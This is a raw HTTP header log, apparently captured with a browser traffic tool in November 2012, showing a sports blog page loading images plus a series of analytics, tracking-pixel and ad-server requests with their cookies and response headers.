User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 19 Nov 2012 04:17:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Sat, 10 Nov 2012 19:42:19 GMT
Etag: &quot;eccb37-d70d-4ce2944237cc0&quot;
Accept-Ranges: bytes
Content-Length: 55053
Keep-Alive: timeout=5, max=494
Connection: Keep-Alive
GET /beacon.js?c1=2&c2=6036378&c3=&c4=&c5=&c6=&c10= HTTP/1.1

Host: b.scorecardresearch.com
GET /beacon.js?c1=2&amp;c2=6036378&amp;c3=&amp;c4=&amp;c5=&amp;c6=&amp;c10= HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Encoding: gzip
Expires: Mon, 03 Dec 2012 04:17:36 GMT
Date: Mon, 19 Nov 2012 04:17:36 GMT
Content-Length: 1190
Connection: keep-alive
Cache-Control: private, no-transform, max-age=1209600
GET /delivery/rta/rta.js?netId=1926&cookieName=cto_rtt&rnd=73667292760&varName=crtg_content HTTP/1.1

Host: rtax.criteo.com
GET /delivery/rta/rta.js?netId=1926&amp;cookieName=cto_rtt&amp;rnd=73667292760&amp;varName=crtg_content HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=utf-8
Cache-Control: private
Server: Microsoft-IIS/7.5
Set-Cookie: uid=5fcb5c56-8740-459d-8200-78d5368bdefd; domain=.criteo.com; expires=Tue, 19-Nov-2013 04:17:36 GMT; path=/
Date: Mon, 19 Nov 2012 04:17:35 GMT
Content-Length: 201
Vary: Accept-Encoding
GET /b?c1=2&c2=6036378&c3=&c4=&c5=&c6=&c10=&c15=&c16=&r=&ns__t=1353298656152&ns_c=UTF-8&c8=http%3A%2F%2Fwww.fenwaywest.com%2Findex.php%3Foption%3Dcom_content%26amp%3Bview%3Darticle%26amp%3Bid%3D7%26amp%3BItemid%3D101&c7=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&c9=http%3A%2F%2Fwww.88websitedesign.com%2Findex.php%3Fwebsite-design-and-development-services-web-company%3Dseo HTTP/1.1

Host: b.scorecardresearch.com
GET /b?c1=2&amp;c2=6036378&amp;c3=&amp;c4=&amp;c5=&amp;c6=&amp;c10=&amp;c15=&amp;c16=&amp;r=&amp;ns__t=1353298656152&amp;ns_c=UTF-8&amp;c8=http%3A%2F%2Fwww.fenwaywest.com%2Findex.php%3Foption%3Dcom_content%26amp%3Bview%3Darticle%26amp%3Bid%3D7%26amp%3BItemid%3D101&amp;c7=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;c9=http%3A%2F%2Fwww.88websitedesign.com%2Findex.php%3Fwebsite-design-and-development-services-web-company%3Dseo HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 302 Moved Temporarily

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://b.scorecardresearch.com/b2?c1=2&amp;c2=6036378&amp;c3=&amp;c4=&amp;c5=&amp;c6=&amp;c10=&amp;c15=&amp;c16=&amp;r=&amp;ns__t=1353298656152&amp;ns_c=UTF-8&amp;c8=http%3A%2F%2Fwww.fenwaywest.com%2Findex.php%3Foption%3Dcom_content%26amp%3Bview%3Darticle%26amp%3Bid%3D7%26amp%3BItemid%3D101&amp;c7=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;c9=http%3A%2F%2Fwww.88websitedesign.com%2Findex.php%3Fwebsite-design-and-development-services-web-company%3Dseo
Date: Mon, 19 Nov 2012 04:17:36 GMT
Connection: keep-alive
Set-Cookie: UID=a2978d-195.159.219.9-1353298656; expires=Sun, 09-Nov-2014 04:17:36 GMT; path=/; domain=.scorecardresearch.com UIDR=1353298656; expires=Sun, 09-Nov-2014 04:17:36 GMT; path=/; domain=.scorecardresearch.com
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
GET /pixel;r=797936158;a=p-a3g2Mplggde4A;labels=FenwayWest.AllSports;fpan=1;fpa=P0-1109205847-1353298656085;ns=1;ce=1;je=1;sr=1176x885x24;enc=n;dst=1;et=1353298656084;tzo=-60;ref=http%3A%2F%2Fwww.88websitedesign.com%2Findex.php%3Fwebsite-design-and-development-services-web-company%3Dseo;url=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php;ogl=description.%2Cimage.http%3A%2F%2Fwww%252Efenwaywest%252Ecom%2Fmodules%2Fmod_raxo_allmode%2Ftools%2Fplaceholder%252Epng%2Curl.http%3A%2F%2Fwww%252Efenwaywest%252Ecom%2Fsh404sef-custom-content%2F404%252Ehtml%2Ctitle.__404__%2Clocale.en_US%2Csite_name.Fenway%20West HTTP/1.1

Host: pixel.quantserve.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/gif
Connection: close
Set-Cookie: mc=50a9b2e0-21a09-68164-7c0b5; expires=Wed, 21-May-2014 04:17:36 GMT; path=/; domain=.quantserve.com
P3P: CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV&quot;
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 35
Date: Mon, 19 Nov 2012 04:17:36 GMT
Server: QS
GET /curation/maintop/thumbimages/espn%20magnifying.jpg HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 19 Nov 2012 04:17:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Thu, 15 Nov 2012 21:52:17 GMT
Etag: &quot;80527f-35746-4ce8faa246640&quot;
Accept-Ranges: bytes
Content-Length: 218950
Keep-Alive: timeout=5, max=499
Connection: Keep-Alive
GET /b2?c1=2&c2=6036378&c3=&c4=&c5=&c6=&c10=&c15=&c16=&r=&ns__t=1353298656152&ns_c=UTF-8&c8=http%3A%2F%2Fwww.fenwaywest.com%2Findex.php%3Foption%3Dcom_content%26amp%3Bview%3Darticle%26amp%3Bid%3D7%26amp%3BItemid%3D101&c7=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&c9=http%3A%2F%2Fwww.88websitedesign.com%2Findex.php%3Fwebsite-design-and-development-services-web-company%3Dseo HTTP/1.1

Host: b.scorecardresearch.com
GET /b2?c1=2&amp;c2=6036378&amp;c3=&amp;c4=&amp;c5=&amp;c6=&amp;c10=&amp;c15=&amp;c16=&amp;r=&amp;ns__t=1353298656152&amp;ns_c=UTF-8&amp;c8=http%3A%2F%2Fwww.fenwaywest.com%2Findex.php%3Foption%3Dcom_content%26amp%3Bview%3Darticle%26amp%3Bid%3D7%26amp%3BItemid%3D101&amp;c7=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;c9=http%3A%2F%2Fwww.88websitedesign.com%2Findex.php%3Fwebsite-design-and-development-services-web-company%3Dseo HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: UID=a2978d-195.159.219.9-1353298656; UIDR=1353298656
HTTP/1.1 204 No Content

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 19 Nov 2012 04:17:36 GMT
Connection: keep-alive
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
GET /templates/yoo_bigeasy/images/background.jpg HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 19 Nov 2012 04:17:36 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Tue, 23 Oct 2012 02:26:23 GMT
Etag: &quot;ecd4d9-28a-4ccb0b23571c0&quot;
Accept-Ranges: bytes
Content-Length: 650
Keep-Alive: timeout=5, max=493
Connection: Keep-Alive
GET /js/counter.asp?site=s52bloguinbaseball HTTP/1.1

Host: s21.sitemeter.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Mon, 19 Nov 2012 04:17:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7356
Expires: Mon, 19 Nov 2012 04:17:23 GMT
Set-Cookie: IP=195%2E159%2E140%2E221; path=/
Cache-Control: private
GET /_/apps-static/_/js/gapi/plusone/rt=j/ver=ZmauHrJi-hM.no./sv=1/am=!lVF6vhgpQzaIV3w7gg/d=1/rs=AItRSTMTSuKxtbCl7AXnY1-y8dTDnN-tCQ/cb=gapi.loaded_0 HTTP/1.1

Host: apis.google.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
Etag: &quot;180778605&quot;
Expires: Sun, 16 Dec 2012 23:09:58 GMT
Date: Fri, 16 Nov 2012 23:09:58 GMT
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=2592000
Content-Length: 26210
Age: 191258
GET /ntpagetag.gif?js=1&ts=1353298656162.244&lc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&rf=http%3A%2F%2Fwww.88websitedesign.com%2Findex.php%3Fwebsite-design-and-development-services-web-company%3Dseo&rs=1176x885&cd=24&ln=en&tz=GMT%20%2B01%3A00&jv=1&site=9859_fenway_west&account=yardbarkernetwork HTTP/1.1

Host: pt200191.unica.com
GET /ntpagetag.gif?js=1&amp;ts=1353298656162.244&amp;lc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;rf=http%3A%2F%2Fwww.88websitedesign.com%2Findex.php%3Fwebsite-design-and-development-services-web-company%3Dseo&amp;rs=1176x885&amp;cd=24&amp;ln=en&amp;tz=GMT%20%2B01%3A00&amp;jv=1&amp;site=9859_fenway_west&amp;account=yardbarkernetwork HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/gif
Server: Apache
Last-Modified: Tue, 30 Jan 2007 21:58:48 GMT
Etag: &quot;ff4c9-55-42849193d1600&quot;
Accept-Ranges: bytes
Content-Length: 85
Expires: Mon, 19 Nov 2012 04:17:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 19 Nov 2012 04:17:36 GMT
Connection: keep-alive
GET /js/counter.asp?site=s27fenwaywest HTTP/1.1

Host: s27.sitemeter.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Mon, 19 Nov 2012 04:17:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7346
Expires: Mon, 19 Nov 2012 04:17:24 GMT
Set-Cookie: IP=195%2E159%2E140%2E221; path=/
Cache-Control: private
GET /s2/oz/images/stars/po/Publisher/sprite4-a67f741843ffc4220554c34bd01bb0bb.png HTTP/1.1

Host: ssl.gstatic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/png
Last-Modified: Thu, 13 Sep 2012 21:47:55 GMT
Date: Fri, 16 Nov 2012 11:57:54 GMT
Expires: Sat, 16 Nov 2013 11:57:54 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 21399
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 231582
GET /cgi-bin/m?ci=us-603545h&cg=0&cc=1&si=http%3A//fenwaywest.com/media/index.php&rp=http%3A//www.88websitedesign.com/index.php%3Fwebsite-design-and-development-services-web-company%3Dseo&ts=compact&rnd=1353298656155 HTTP/1.1

Host: secure-us.imrworldwide.com
GET /cgi-bin/m?ci=us-603545h&amp;cg=0&amp;cc=1&amp;si=http%3A//fenwaywest.com/media/index.php&amp;rp=http%3A//www.88websitedesign.com/index.php%3Fwebsite-design-and-development-services-web-company%3Dseo&amp;ts=compact&amp;rnd=1353298656155 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 302 Found

Content-Type: text/html
Server: nginx
Date: Mon, 19 Nov 2012 04:17:36 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
Set-Cookie: V5=AStfNyIZMVsrEhozMgQjIy4BGCIsK1InHlJ4kA__; expires=Wed, 19-Nov-2014 04:17:36 GMT; domain=.imrworldwide.com; path=/cgi-bin IMRID=UKmy4IpsGzkAAGuPMNI; expires=Wed, 19-Nov-2014 04:17:36 GMT; path=/cgi-bin; domain=.imrworldwide.com
Location: http://secure-us.imrworldwide.com/cgi-bin/m1?ci=us-603545h&amp;cg=0&amp;cc=1&amp;si=http%3A//fenwaywest.com/media/index.php&amp;rp=http%3A//www.88websitedesign.com/index.php%3Fwebsite-design-and-development-services-web-company%3Dseo&amp;ts=compact&amp;rnd=1353298656155&amp;ja=1
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
P3P: policyref=&quot;http://www.imrworldwide.com/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID PSA ADM OUR IND UNI NAV COM&quot;
GET /adj/yb.fenwaywest/;chan1=mlb;rating=pg;dcopt=ist;yb=ad;s1=;s2=;tile=1;sz=728x90;ord=5887935212? HTTP/1.1

Host: ad.doubleclick.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: id=223ae1776901005b||t=1350343758|et=730|cs=002213fd480aa30e9cef2f5d42
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Server: DCLK-AdSvr
Content-Length: 267
Content-Encoding: gzip
Date: Mon, 19 Nov 2012 04:17:36 GMT
GET /cgi-bin/m1?ci=us-603545h&cg=0&cc=1&si=http%3A//fenwaywest.com/media/index.php&rp=http%3A//www.88websitedesign.com/index.php%3Fwebsite-design-and-development-services-web-company%3Dseo&ts=compact&rnd=1353298656155&ja=1 HTTP/1.1

Host: secure-us.imrworldwide.com
GET /cgi-bin/m1?ci=us-603545h&amp;cg=0&amp;cc=1&amp;si=http%3A//fenwaywest.com/media/index.php&amp;rp=http%3A//www.88websitedesign.com/index.php%3Fwebsite-design-and-development-services-web-company%3Dseo&amp;ts=compact&amp;rnd=1353298656155&amp;ja=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: V5=AStfNyIZMVsrEhozMgQjIy4BGCIsK1InHlJ4kA__; IMRID=UKmy4IpsGzkAAGuPMNI
HTTP/1.1 200 OK

Content-Type: image/gif
Server: nginx
Date: Mon, 19 Nov 2012 04:17:36 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
P3P: policyref=&quot;http://www.imrworldwide.com/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID PSA ADM OUR IND UNI NAV COM&quot;
GET /AdServer/js/showad.js HTTP/1.1

Host: ads.pubmatic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Expires: Tue, 20 Nov 2012 03:09:46 GMT
Last-Modified: Mon, 08 Oct 2012 11:29:02 GMT
Etag: &quot;1930978-5c3d-8741bb80&quot;
Cache-Control: max-age=172736, public
Server: Apache/2.2.3 (Red Hat)
Accept-Ranges: bytes
Content-Encoding: gzip
P3P: CP=&quot;NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC&quot;, CP=&quot;NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC&quot;
Content-Length: 8128
Date: Mon, 19 Nov 2012 04:17:36 GMT
Connection: keep-alive
Vary: Accept-Encoding
GET /AdServer/js/adTagInfo.html HTTP/1.1

Host: ads.pubmatic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Expires: Tue, 20 Nov 2012 14:39:19 GMT
Last-Modified: Wed, 06 Jun 2012 12:18:01 GMT
Etag: &quot;19309cc-1493-c21cd040&quot;
Cache-Control: max-age=172800
Server: Apache/2.2.3 (Red Hat)
Accept-Ranges: bytes
Content-Encoding: gzip
P3P: CP=&quot;NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC&quot;, CP=&quot;NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC&quot;
Content-Length: 1919
Date: Mon, 19 Nov 2012 04:17:36 GMT
Connection: keep-alive
Vary: Accept-Encoding
GET /AdServer/AdServerServlet?pubId=28596&siteId=28597&adId=24361&kadheight=90&kadwidth=728&inIframe=1&operId=3&kbgColor=498A72&ktextColor=191919&klinkColor=A60B1D&kltstamp=2012-11-19%205:17:36&timezone=1&screenResolution=1176x885&adPosition=-1x-1&frameName=http_fenwaywest_commediaindex_php_komli_ads_frame_0_28596_28597&pmUniAdId=top_0_0&ranreq=0.5295620945665518&pageURL=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&refurl=http%3A%2F%2Fwww.88websitedesign.com%2Findex.php HTTP/1.1

Host: showads.pubmatic.com
GET /AdServer/AdServerServlet?pubId=28596&amp;siteId=28597&amp;adId=24361&amp;kadheight=90&amp;kadwidth=728&amp;inIframe=1&amp;operId=3&amp;kbgColor=498A72&amp;ktextColor=191919&amp;klinkColor=A60B1D&amp;kltstamp=2012-11-19%205:17:36&amp;timezone=1&amp;screenResolution=1176x885&amp;adPosition=-1x-1&amp;frameName=http_fenwaywest_commediaindex_php_komli_ads_frame_0_28596_28597&amp;pmUniAdId=top_0_0&amp;ranreq=0.5295620945665518&amp;pageURL=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;refurl=http%3A%2F%2Fwww.88websitedesign.com%2Findex.php HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/html
Date: Mon, 19 Nov 2012 04:17:36 GMT
Server: Apache
Set-Cookie: PUBMDCID=3; domain=pubmatic.com; expires=Tue, 19-Nov-2013 04:17:36 GMT; path=/ KADUSERCOOKIE=CC78ACA8-9353-43AF-B346-6DE47ACCFD06; domain=pubmatic.com; expires=Tue, 19-Nov-2013 04:17:36 GMT; path=/ pubfreq_28597=; domain=pubmatic.com; expires=Wed, 21-Nov-2012 04:17:36 GMT; path=/ pubtime_28597=TMC; domain=pubmatic.com; expires=Tue, 20-Nov-2012 04:17:36 GMT; path=/ pubfreq_28597_24361_791307272=1425-1; domain=pubmatic.com; expires=Mon, 19-Nov-2012 04:57:36 GMT; path=/ PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 20-Nov-2012 04:17:36 GMT; path=/
X-ktk: AdServer2014
Vary: Accept-Encoding
Content-Encoding: gzip
P3P: CP=&quot;NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC&quot;
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
GET /ttj?id=937121&size=728x90 HTTP/1.1

Host: ads.cpxinteractive.com
GET /ttj?id=937121&amp;size=728x90 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 302 Found

Content-Type: text/html; charset=ISO-8859-1
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Location: http://ib.adnxs.com/ttj?id=937121&amp;size=728x90
Date: Mon, 19 Nov 2012 04:17:37 GMT
Content-Length: 0
GET /ttj?id=937121&size=728x90 HTTP/1.1

Host: ib.adnxs.com
GET /ttj?id=937121&amp;size=728x90 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG7]PCxrx)0s]#%2L_'x%SEV/hnJip8Ep.I(G*axlrk5.$WN_]Dl5M7G(nDS'6pnU
HTTP/1.1 200 OK

Content-Type: text/javascript
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
